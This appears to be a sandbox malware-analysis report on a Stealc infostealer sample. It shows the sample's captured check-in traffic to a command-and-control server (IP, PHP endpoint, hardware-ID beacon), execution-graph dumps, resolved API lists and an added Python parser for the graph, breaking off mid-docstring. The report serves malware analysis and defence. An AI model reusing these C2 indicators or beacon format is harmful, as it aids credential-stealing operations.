Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | 4408 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 04:01:09.289606094 CET | 90 | OUT | GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
Oct 29, 2024 04:01:10.180682898 CET | 203 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 03:01:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 29, 2024 04:01:10.184680939 CET | 412 | OUT | POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECF
Host: 185.215.113.206
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 44 39 30 33 34 32 42 34 38 35 33 30 32 35 39 39 37 34 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 2d 2d 0d 0a
                              Data Ascii: ------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="hwid"0ED90342B485302599741------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="build"tale------AAAKEBGDAFHIIDHIIECF--
                              Oct 29, 2024 04:01:10.465209961 CET | 210 | IN | HTTP/1.1 200 OK
                                Date: Tue, 29 Oct 2024 03:01:10 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=



                              Target ID:0
                              Start time:23:01:06
                              Start date:28/10/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0xea0000
                              File size:2'149'888 bytes
                              MD5 hash:1F9BBFE42E611B314849010FB1BBE51C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1769403587.0000000005850000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true


                                Execution Graph

                                Execution Coverage:3%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:3.5%
                                Total number of Nodes:1327
                                Total number of Limit Nodes:24
                                execution_graph: [serialized node/edge dump of the interactive execution-graph viewer; the graph itself is not reproducible here. Nodes are function addresses inside file.exe, each annotated with the Windows API calls it makes (among them OpenEventA/CreateEventA, GetSystemTime/SystemTimeToFileTime, GetUserDefaultLangID, GetSystemInfo, VirtualAllocExNuma, VirtualAlloc/VirtualFree, VirtualProtect, GlobalMemoryStatusEx, GetUserNameA/GetComputerNameA, GetWindowsDirectoryA, GetPEB, LoadLibraryA/GetProcAddress, lstrcpy/lstrcat/lstrlen, StrCmpCA, sscanf, Sleep, CloseHandle and ExitProcess); edges of the form a->b record calls from node a to node b.]
37431 ea4610 2 API calls 37430->37431 37432 ea43ec 37431->37432 37433 ea4610 2 API calls 37432->37433 37434 ea4405 37433->37434 37435 ea4610 2 API calls 37434->37435 37436 ea441e 37435->37436 37437 ea4610 2 API calls 37436->37437 37438 ea4437 37437->37438 37439 ea4610 2 API calls 37438->37439 37440 ea4450 37439->37440 37441 ea4610 2 API calls 37440->37441 37442 ea4469 37441->37442 37443 ea4610 2 API calls 37442->37443 37444 ea4482 37443->37444 37445 ea4610 2 API calls 37444->37445 37446 ea449b 37445->37446 37447 ea4610 2 API calls 37446->37447 37448 ea44b4 37447->37448 37449 ea4610 2 API calls 37448->37449 37450 ea44cd 37449->37450 37451 ea4610 2 API calls 37450->37451 37452 ea44e6 37451->37452 37453 ea4610 2 API calls 37452->37453 37454 ea44ff 37453->37454 37455 ea4610 2 API calls 37454->37455 37456 ea4518 37455->37456 37457 ea4610 2 API calls 37456->37457 37458 ea4531 37457->37458 37459 ea4610 2 API calls 37458->37459 37460 ea454a 37459->37460 37461 ea4610 2 API calls 37460->37461 37462 ea4563 37461->37462 37463 ea4610 2 API calls 37462->37463 37464 ea457c 37463->37464 37465 ea4610 2 API calls 37464->37465 37466 ea4595 37465->37466 37467 ea4610 2 API calls 37466->37467 37468 ea45ae 37467->37468 37469 ea4610 2 API calls 37468->37469 37470 ea45c7 37469->37470 37471 ea4610 2 API calls 37470->37471 37472 ea45e0 37471->37472 37473 ea4610 2 API calls 37472->37473 37474 ea45f9 37473->37474 37475 eb9f20 37474->37475 37476 eb9f30 43 API calls 37475->37476 37477 eba346 8 API calls 37475->37477 37476->37477 37478 eba3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37477->37478 37479 eba456 37477->37479 37478->37479 37480 eba463 8 API calls 37479->37480 37481 eba526 37479->37481 37480->37481 37482 eba5a8 37481->37482 37483 eba52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37481->37483 37484 eba647 37482->37484 37485 eba5b5 6 API calls 37482->37485 37483->37482 37486 eba72f 37484->37486 37487 eba654 9 API calls 
37484->37487 37485->37484 37488 eba738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37486->37488 37489 eba7b2 37486->37489 37487->37486 37488->37489 37490 eba7bb GetProcAddress GetProcAddress 37489->37490 37491 eba7ec 37489->37491 37490->37491 37492 eba825 37491->37492 37493 eba7f5 GetProcAddress GetProcAddress 37491->37493 37494 eba922 37492->37494 37495 eba832 10 API calls 37492->37495 37493->37492 37496 eba92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37494->37496 37497 eba98d 37494->37497 37495->37494 37496->37497 37498 eba9ae 37497->37498 37499 eba996 GetProcAddress 37497->37499 37500 eb5ef3 37498->37500 37501 eba9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37498->37501 37499->37498 37502 ea1590 37500->37502 37501->37500 37772 ea16b0 37502->37772 37505 ebaab0 lstrcpy 37506 ea15b5 37505->37506 37507 ebaab0 lstrcpy 37506->37507 37508 ea15c7 37507->37508 37509 ebaab0 lstrcpy 37508->37509 37510 ea15d9 37509->37510 37511 ebaab0 lstrcpy 37510->37511 37512 ea1663 37511->37512 37513 eb5760 37512->37513 37514 eb5771 37513->37514 37515 ebab30 2 API calls 37514->37515 37516 eb577e 37515->37516 37517 ebab30 2 API calls 37516->37517 37518 eb578b 37517->37518 37519 ebab30 2 API calls 37518->37519 37520 eb5798 37519->37520 37521 ebaa50 lstrcpy 37520->37521 37522 eb57a5 37521->37522 37523 ebaa50 lstrcpy 37522->37523 37524 eb57b2 37523->37524 37525 ebaa50 lstrcpy 37524->37525 37526 eb57bf 37525->37526 37527 ebaa50 lstrcpy 37526->37527 37549 eb57cc 37527->37549 37528 ebaa50 lstrcpy 37528->37549 37529 eb5893 StrCmpCA 37529->37549 37530 eb58f0 StrCmpCA 37531 eb5a2c 37530->37531 37530->37549 37532 ebabb0 lstrcpy 37531->37532 37534 eb5a38 37532->37534 37533 ea1590 lstrcpy 37533->37549 37535 ebab30 2 API calls 37534->37535 37536 eb5a46 37535->37536 37539 ebab30 2 API calls 37536->37539 37537 eb5aa6 StrCmpCA 37540 eb5be1 37537->37540 37537->37549 37538 ebaab0 lstrcpy 37538->37549 37542 eb5a55 37539->37542 37541 ebabb0 
lstrcpy 37540->37541 37543 eb5bed 37541->37543 37544 ea16b0 lstrcpy 37542->37544 37546 ebab30 2 API calls 37543->37546 37567 eb5a61 37544->37567 37545 ebab30 lstrlen lstrcpy 37545->37549 37547 eb5bfb 37546->37547 37550 ebab30 2 API calls 37547->37550 37548 eb5c5b StrCmpCA 37551 eb5c78 37548->37551 37552 eb5c66 Sleep 37548->37552 37549->37528 37549->37529 37549->37530 37549->37533 37549->37537 37549->37538 37549->37545 37549->37548 37554 ebabb0 lstrcpy 37549->37554 37560 eb5510 25 API calls 37549->37560 37563 eb59da StrCmpCA 37549->37563 37565 eb5b8f StrCmpCA 37549->37565 37566 eb5440 20 API calls 37549->37566 37555 eb5c0a 37550->37555 37553 ebabb0 lstrcpy 37551->37553 37552->37549 37556 eb5c84 37553->37556 37554->37549 37557 ea16b0 lstrcpy 37555->37557 37558 ebab30 2 API calls 37556->37558 37557->37567 37559 eb5c93 37558->37559 37561 ebab30 2 API calls 37559->37561 37560->37549 37562 eb5ca2 37561->37562 37564 ea16b0 lstrcpy 37562->37564 37563->37549 37564->37567 37565->37549 37566->37549 37567->36620 37569 eb76dc 37568->37569 37570 eb76e3 GetVolumeInformationA 37568->37570 37569->37570 37571 eb7721 37570->37571 37572 eb778c GetProcessHeap RtlAllocateHeap 37571->37572 37573 eb77a9 37572->37573 37574 eb77b8 wsprintfA 37572->37574 37575 ebaa50 lstrcpy 37573->37575 37576 ebaa50 lstrcpy 37574->37576 37577 eb5ff7 37575->37577 37576->37577 37577->36641 37579 ebaab0 lstrcpy 37578->37579 37580 ea48e9 37579->37580 37781 ea4800 37580->37781 37582 ea48f5 37583 ebaa50 lstrcpy 37582->37583 37584 ea4927 37583->37584 37585 ebaa50 lstrcpy 37584->37585 37586 ea4934 37585->37586 37587 ebaa50 lstrcpy 37586->37587 37588 ea4941 37587->37588 37589 ebaa50 lstrcpy 37588->37589 37590 ea494e 37589->37590 37591 ebaa50 lstrcpy 37590->37591 37592 ea495b InternetOpenA StrCmpCA 37591->37592 37593 ea4994 37592->37593 37594 ea4f1b InternetCloseHandle 37593->37594 37787 eb8cf0 37593->37787 37596 ea4f38 37594->37596 37802 eaa210 CryptStringToBinaryA 37596->37802 37597 ea49b3 37795 ebac30 37597->37795 
37600 ea49c6 37602 ebabb0 lstrcpy 37600->37602 37607 ea49cf 37602->37607 37603 ebab30 2 API calls 37604 ea4f55 37603->37604 37606 ebacc0 4 API calls 37604->37606 37605 ea4f77 ctype 37609 ebaab0 lstrcpy 37605->37609 37608 ea4f6b 37606->37608 37611 ebacc0 4 API calls 37607->37611 37610 ebabb0 lstrcpy 37608->37610 37622 ea4fa7 37609->37622 37610->37605 37612 ea49f9 37611->37612 37613 ebabb0 lstrcpy 37612->37613 37614 ea4a02 37613->37614 37615 ebacc0 4 API calls 37614->37615 37616 ea4a21 37615->37616 37617 ebabb0 lstrcpy 37616->37617 37618 ea4a2a 37617->37618 37619 ebac30 3 API calls 37618->37619 37620 ea4a48 37619->37620 37621 ebabb0 lstrcpy 37620->37621 37623 ea4a51 37621->37623 37622->36644 37624 ebacc0 4 API calls 37623->37624 37625 ea4a70 37624->37625 37626 ebabb0 lstrcpy 37625->37626 37627 ea4a79 37626->37627 37628 ebacc0 4 API calls 37627->37628 37629 ea4a98 37628->37629 37630 ebabb0 lstrcpy 37629->37630 37631 ea4aa1 37630->37631 37632 ebacc0 4 API calls 37631->37632 37633 ea4acd 37632->37633 37634 ebac30 3 API calls 37633->37634 37635 ea4ad4 37634->37635 37636 ebabb0 lstrcpy 37635->37636 37637 ea4add 37636->37637 37638 ea4af3 InternetConnectA 37637->37638 37638->37594 37639 ea4b23 HttpOpenRequestA 37638->37639 37641 ea4b78 37639->37641 37642 ea4f0e InternetCloseHandle 37639->37642 37643 ebacc0 4 API calls 37641->37643 37642->37594 37644 ea4b8c 37643->37644 37645 ebabb0 lstrcpy 37644->37645 37646 ea4b95 37645->37646 37647 ebac30 3 API calls 37646->37647 37648 ea4bb3 37647->37648 37649 ebabb0 lstrcpy 37648->37649 37650 ea4bbc 37649->37650 37651 ebacc0 4 API calls 37650->37651 37652 ea4bdb 37651->37652 37653 ebabb0 lstrcpy 37652->37653 37654 ea4be4 37653->37654 37655 ebacc0 4 API calls 37654->37655 37656 ea4c05 37655->37656 37657 ebabb0 lstrcpy 37656->37657 37658 ea4c0e 37657->37658 37659 ebacc0 4 API calls 37658->37659 37660 ea4c2e 37659->37660 37661 ebabb0 lstrcpy 37660->37661 37662 ea4c37 37661->37662 37663 ebacc0 4 API calls 37662->37663 37664 ea4c56 
37663->37664 37665 ebabb0 lstrcpy 37664->37665 37666 ea4c5f 37665->37666 37667 ebac30 3 API calls 37666->37667 37668 ea4c7d 37667->37668 37669 ebabb0 lstrcpy 37668->37669 37670 ea4c86 37669->37670 37671 ebacc0 4 API calls 37670->37671 37672 ea4ca5 37671->37672 37673 ebabb0 lstrcpy 37672->37673 37674 ea4cae 37673->37674 37675 ebacc0 4 API calls 37674->37675 37676 ea4ccd 37675->37676 37677 ebabb0 lstrcpy 37676->37677 37678 ea4cd6 37677->37678 37679 ebac30 3 API calls 37678->37679 37680 ea4cf4 37679->37680 37681 ebabb0 lstrcpy 37680->37681 37682 ea4cfd 37681->37682 37683 ebacc0 4 API calls 37682->37683 37684 ea4d1c 37683->37684 37685 ebabb0 lstrcpy 37684->37685 37686 ea4d25 37685->37686 37687 ebacc0 4 API calls 37686->37687 37688 ea4d46 37687->37688 37689 ebabb0 lstrcpy 37688->37689 37690 ea4d4f 37689->37690 37691 ebacc0 4 API calls 37690->37691 37692 ea4d6f 37691->37692 37693 ebabb0 lstrcpy 37692->37693 37694 ea4d78 37693->37694 37695 ebacc0 4 API calls 37694->37695 37696 ea4d97 37695->37696 37697 ebabb0 lstrcpy 37696->37697 37698 ea4da0 37697->37698 37699 ebac30 3 API calls 37698->37699 37700 ea4dbe 37699->37700 37701 ebabb0 lstrcpy 37700->37701 37702 ea4dc7 37701->37702 37703 ebaa50 lstrcpy 37702->37703 37704 ea4de2 37703->37704 37705 ebac30 3 API calls 37704->37705 37706 ea4e03 37705->37706 37707 ebac30 3 API calls 37706->37707 37708 ea4e0a 37707->37708 37709 ebabb0 lstrcpy 37708->37709 37710 ea4e16 37709->37710 37711 ea4e37 lstrlen 37710->37711 37712 ea4e4a 37711->37712 37713 ea4e53 lstrlen 37712->37713 37801 ebade0 37713->37801 37715 ea4e63 HttpSendRequestA 37716 ea4e82 InternetReadFile 37715->37716 37717 ea4eb7 InternetCloseHandle 37716->37717 37722 ea4eae 37716->37722 37719 ebab10 37717->37719 37719->37642 37720 ebacc0 4 API calls 37720->37722 37721 ebabb0 lstrcpy 37721->37722 37722->37716 37722->37717 37722->37720 37722->37721 37808 ebade0 37723->37808 37725 eb1a14 StrCmpCA 37726 eb1a1f ExitProcess 37725->37726 37727 eb1a27 37725->37727 37728 eb1c12 
37727->37728 37729 eb1acf StrCmpCA 37727->37729 37730 eb1aad StrCmpCA 37727->37730 37731 eb1b63 StrCmpCA 37727->37731 37732 eb1b82 StrCmpCA 37727->37732 37733 eb1b41 StrCmpCA 37727->37733 37734 eb1ba1 StrCmpCA 37727->37734 37735 eb1bc0 StrCmpCA 37727->37735 37736 eb1b1f StrCmpCA 37727->37736 37737 eb1afd StrCmpCA 37727->37737 37738 ebab30 lstrlen lstrcpy 37727->37738 37728->36646 37729->37727 37730->37727 37731->37727 37732->37727 37733->37727 37734->37727 37735->37727 37736->37727 37737->37727 37738->37727 37739->36652 37740->36654 37741->36660 37742->36662 37743->36668 37744->36670 37745->36674 37746->36678 37747->36682 37748->36688 37749->36690 37750->36694 37751->36707 37752->36712 37753->36711 37754->36708 37755->36711 37756->36727 37757->36714 37758->36718 37759->36719 37760->36724 37761->36729 37762->36731 37763->36739 37764->36741 37765->36765 37766->36769 37767->36768 37768->36764 37769->36768 37770->36778 37773 ebaab0 lstrcpy 37772->37773 37774 ea16c3 37773->37774 37775 ebaab0 lstrcpy 37774->37775 37776 ea16d5 37775->37776 37777 ebaab0 lstrcpy 37776->37777 37778 ea16e7 37777->37778 37779 ebaab0 lstrcpy 37778->37779 37780 ea15a3 37779->37780 37780->37505 37782 ea4816 37781->37782 37783 ea4888 lstrlen 37782->37783 37807 ebade0 37783->37807 37785 ea4898 InternetCrackUrlA 37786 ea48b7 37785->37786 37786->37582 37788 ebaa50 lstrcpy 37787->37788 37789 eb8d04 37788->37789 37790 ebaa50 lstrcpy 37789->37790 37791 eb8d12 GetSystemTime 37790->37791 37793 eb8d29 37791->37793 37792 ebaab0 lstrcpy 37794 eb8d8c 37792->37794 37793->37792 37794->37597 37796 ebac41 37795->37796 37797 ebac98 37796->37797 37799 ebac78 lstrcpy lstrcat 37796->37799 37798 ebaab0 lstrcpy 37797->37798 37800 ebaca4 37798->37800 37799->37797 37800->37600 37801->37715 37803 ea4f3e 37802->37803 37804 eaa249 LocalAlloc 37802->37804 37803->37603 37803->37605 37804->37803 37805 eaa264 CryptStringToBinaryA 37804->37805 37805->37803 37806 eaa289 LocalFree 37805->37806 37806->37803 37807->37785 37808->37725
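The graph listing above reaches the reader as a flat token stream: `<id> <addr> [api ...]` node definitions, `<id>-><id>` edges, collapsed sub-calls such as `2 API calls`, and, in the per-function graphs further down, basic-block ranges like `eb9bb0-eb9bc4` with `call <addr>` and `GetProcAddress * 21` multiplicities. Turning that back into nodes and edges is the quickest way to read a function's API sequence without the Joe Sandbox viewer. The parser below is an added example written for this page, not part of the report or of any Joe Sandbox tooling; the token heuristics (decimal node ids, hex addresses, a `*` count applying to the preceding API name) are assumptions drawn from this report's listing, and the two sample inputs are constructed subsets copied from it.

```python
"""Parse the flattened control-flow-graph text that Joe Sandbox emits
(e.g. "37592 ea495b InternetOpenA StrCmpCA 37591->37592 ...") back into
nodes, edges and API sequences.

Token grammar, as far as this report shows it (an assumption, not a spec):
  <id> <addr>[-<addr>] [call <addr>] [<Api> [* <n>]]... [<n> API calls]
  <id>-><id>
Node ids are decimal, addresses hex; every token between one node header
and the next header belongs to that node.
"""
import re
from collections import Counter
from dataclasses import dataclass, field

EDGE = re.compile(r"^(\d+)->(\d+)$")
ADDR = re.compile(r"^[0-9a-f]{4,8}(?:-[0-9a-f]{4,8})?$")


@dataclass
class Node:
    nid: int
    addr: str                                    # "ea495b" or a block range "eb9bb0-eb9bc4"
    apis: list = field(default_factory=list)     # API names, one entry per call ("* 21" expanded)
    calls: list = field(default_factory=list)    # callee addresses from "call <addr>"
    summary: list = field(default_factory=list)  # collapsed sub-call notes such as "2 API calls"


def parse_cfg(text):
    """Return ({node_id: Node}, [(src, dst), ...]) in listing order."""
    toks = text.split()
    nodes, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        tok = toks[i]
        m = EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        # node header: a decimal id followed by a hex address or block range
        if tok.isdigit() and i + 1 < len(toks) and ADDR.match(toks[i + 1]):
            cur = Node(int(tok), toks[i + 1])
            nodes[cur.nid] = cur
            i += 2
            continue
        if cur is None:                 # leading junk such as "control_flow_graph" / "API calls"
            i += 1
            continue
        if tok == "call" and i + 1 < len(toks):
            cur.calls.append(toks[i + 1])
            i += 2
            continue
        if tok.isdigit() and toks[i + 1:i + 3] == ["API", "calls"]:
            cur.summary.append(f"{tok} API calls")
            i += 3
            continue
        if tok == "*" and cur.apis and i + 1 < len(toks) and toks[i + 1].isdigit():
            cur.apis.extend([cur.apis[-1]] * (int(toks[i + 1]) - 1))   # "GetProcAddress * 21"
            i += 2
            continue
        cur.apis.append(tok)            # plain API name (IDA tags such as "ctype" land here too)
        i += 1
    return nodes, edges


def api_counts(nodes):
    """How often each API name appears across all nodes."""
    return Counter(a for n in nodes.values() for a in n.apis)


def nodes_calling(nodes, api):
    """Addresses of the nodes that call `api`, in listing order."""
    return [n.addr for n in nodes.values() if api in n.apis]


def follow(nodes, edges, start, limit=100):
    """Walk from `start`, taking the first-listed successor each time.
    Returns [(addr, apis), ...] and stops at a dead end, a revisit, or a
    node the listing never defined."""
    first = {}
    for src, dst in edges:
        first.setdefault(src, dst)
    path, seen, nid = [], set(), start
    while nid in nodes and nid not in seen and len(path) < limit:
        seen.add(nid)
        path.append((nodes[nid].addr, list(nodes[nid].apis)))
        nid = first.get(nid)
    return path


def reachable_apis(nodes, edges, start):
    """Set of API names on every node reachable from `start` (DFS over all edges)."""
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    seen, stack, apis = set(), [start], set()
    while stack:
        nid = stack.pop()
        if nid in seen or nid not in nodes:
            continue
        seen.add(nid)
        apis.update(nodes[nid].apis)
        stack.extend(succ.get(nid, []))
    return apis


# Constructed samples: fragments copied from this report's graph listing (the ea4610
# call run, the WinINet chain) and from the eb9bb0 basic-block graph.
SAMPLE_CFG = """
API calls 37180->37181 37182 ea37b7 37181->37182 37183 ea4610 2 API calls 37182->37183 37184 ea37d0 37183->37184
37591 ebaa50 lstrcpy 37590->37591 37592 ea495b InternetOpenA StrCmpCA 37591->37592 37593 ea4994 37592->37593
37594 ea4f1b InternetCloseHandle 37593->37594 37638 ea4af3 InternetConnectA 37637->37638 37638->37594
37639 ea4b23 HttpOpenRequestA 37638->37639 37715 ea4e63 HttpSendRequestA 37716 ea4e82 InternetReadFile 37715->37716
37717 ea4eb7 InternetCloseHandle 37716->37717
"""
SAMPLE_BLOCKS = ("control_flow_graph 660 eb9bb0-eb9bc4 call eb9aa0 663 eb9bca-eb9dde call eb9ad0 "
                 "GetProcAddress * 21 660->663 664 eb9de3-eb9e42 LoadLibraryA * 5 660->664 663->664 "
                 "666 eb9e5d-eb9e64 664->666 667 eb9e44-eb9e58 GetProcAddress 664->667")

if __name__ == "__main__":
    nodes, edges = parse_cfg(SAMPLE_CFG)
    for addr, apis in follow(nodes, edges, 37591):      # the InternetOpenA path
        print(addr, " ".join(apis))
    print(api_counts(nodes).most_common(3))
    blocks, _ = parse_cfg(SAMPLE_BLOCKS)
    print(api_counts(blocks))
```

Following only the first-listed successor gives the path the listing orders first, which for a node such as ea4af3 (InternetConnectA) is the failure edge into InternetCloseHandle; use reachable_apis when you want everything a function can touch regardless of branch outcome.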

                                Control-flow Graph (function eb9bb0; the executed / not-executed colouring of the graph did not survive extraction)
                                Basic blocks and branches: eb9bb0-eb9bc4 (call eb9aa0) goes either to eb9bca-eb9dde (call eb9ad0, then GetProcAddress x21) or straight to eb9de3-eb9e42 (LoadLibraryA x5); from there each of eb9e44-eb9e58 (GetProcAddress), eb9e66-eb9e91 (GetProcAddress x2), eb9e9f-eb9eb3 (GetProcAddress), eb9ec1-eb9ed4 (GetProcAddress) and eb9ee2-eb9f0c (GetProcAddress x2) is either entered or skipped by the branch block before it (eb9e5d-eb9e64, eb9e96-eb9e9d, eb9eb8-eb9ebf, eb9ed9-eb9ee0), and all paths join at eb9f11-eb9f12.
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,01BF3150), ref: 00EB9BF1
                                • GetProcAddress.KERNEL32(74DD0000,01BF31E0), ref: 00EB9C0A
                                • GetProcAddress.KERNEL32(74DD0000,01BF3000), ref: 00EB9C22
                                • GetProcAddress.KERNEL32(74DD0000,01BF30F0), ref: 00EB9C3A
                                • GetProcAddress.KERNEL32(74DD0000,01BF30A8), ref: 00EB9C53
                                • GetProcAddress.KERNEL32(74DD0000,01BF9E28), ref: 00EB9C6B
                                • GetProcAddress.KERNEL32(74DD0000,01BE5BB0), ref: 00EB9C83
                                • GetProcAddress.KERNEL32(74DD0000,01BE5B70), ref: 00EB9C9C
                                • GetProcAddress.KERNEL32(74DD0000,01BF3048), ref: 00EB9CB4
                                • GetProcAddress.KERNEL32(74DD0000,01BF3108), ref: 00EB9CCC
                                • GetProcAddress.KERNEL32(74DD0000,01BF3018), ref: 00EB9CE5
                                • GetProcAddress.KERNEL32(74DD0000,01BF3030), ref: 00EB9CFD
                                • GetProcAddress.KERNEL32(74DD0000,01BE5AD0), ref: 00EB9D15
                                • GetProcAddress.KERNEL32(74DD0000,01BF3240), ref: 00EB9D2E
                                • GetProcAddress.KERNEL32(74DD0000,01BF2FE8), ref: 00EB9D46
                                • GetProcAddress.KERNEL32(74DD0000,01BE5BD0), ref: 00EB9D5E
                                • GetProcAddress.KERNEL32(74DD0000,01BF3258), ref: 00EB9D77
                                • GetProcAddress.KERNEL32(74DD0000,01BF3120), ref: 00EB9D8F
                                • GetProcAddress.KERNEL32(74DD0000,01BE5C50), ref: 00EB9DA7
                                • GetProcAddress.KERNEL32(74DD0000,01BF32D0), ref: 00EB9DC0
                                • GetProcAddress.KERNEL32(74DD0000,01BE5E10), ref: 00EB9DD8
                                • LoadLibraryA.KERNEL32(01BF3348,?,00EB6CA0), ref: 00EB9DEA
                                • LoadLibraryA.KERNEL32(01BF3360,?,00EB6CA0), ref: 00EB9DFB
                                • LoadLibraryA.KERNEL32(01BF3378,?,00EB6CA0), ref: 00EB9E0D
                                • LoadLibraryA.KERNEL32(01BF33A8,?,00EB6CA0), ref: 00EB9E1F
                                • LoadLibraryA.KERNEL32(01BF3300,?,00EB6CA0), ref: 00EB9E30
                                • GetProcAddress.KERNEL32(75A70000,01BF3330), ref: 00EB9E52
                                • GetProcAddress.KERNEL32(75290000,01BF3318), ref: 00EB9E73
                                • GetProcAddress.KERNEL32(75290000,01BF3390), ref: 00EB9E8B
                                • GetProcAddress.KERNEL32(75BD0000,01BF32E8), ref: 00EB9EAD
                                • GetProcAddress.KERNEL32(75450000,01BE5E30), ref: 00EB9ECE
                                • GetProcAddress.KERNEL32(76E90000,01BF9CD8), ref: 00EB9EEF
                                • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00EB9F06
                                Strings
                                • NtQueryInformationProcess, xrefs: 00EB9EFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 19269057dace6d74ba93d249f00e1f78d899d621e7e92931c0210ad2d1f37ccf
                                • Instruction ID: 2b41215c7f2fdcdab608c7fd495b3a965d5a76bf2edcfc7ceb2e137a8c917675
                                • Opcode Fuzzy Hash: 19269057dace6d74ba93d249f00e1f78d899d621e7e92931c0210ad2d1f37ccf
                                • Instruction Fuzzy Hash: 86A1FEB55146009FD36CDFA9F88C96677BAA74D701B10893AF539C33A8EA7495C0CF60
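The APIs list above shows 21 GetProcAddress calls against module handle 74DD0000 and a further ten against handles that the five LoadLibraryA calls return, and only one of them (NtQueryInformationProcess) carries a name Joe Sandbox could render as a string; every other name argument is printed as a raw pointer in the 01BFxxxx range. Counting that pattern per module handle is a quick triage signal for hidden import resolution. The parser below is an added example written for this page, not part of the report or of any Joe Sandbox tooling; the sample is a constructed subset of eight lines copied from the list above, and the threshold in looks_like_hidden_imports is an assumption for this example, not a Joe Sandbox rule.

```python
"""Summarise the "APIs" bullet lines of a Joe Sandbox function entry, e.g.
    • GetProcAddress.KERNEL32(74DD0000,01BF3150), ref: 00EB9BF1
    • LoadLibraryA.KERNEL32(01BF3348,?,00EB6CA0), ref: 00EB9DEA
    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00EB9F06
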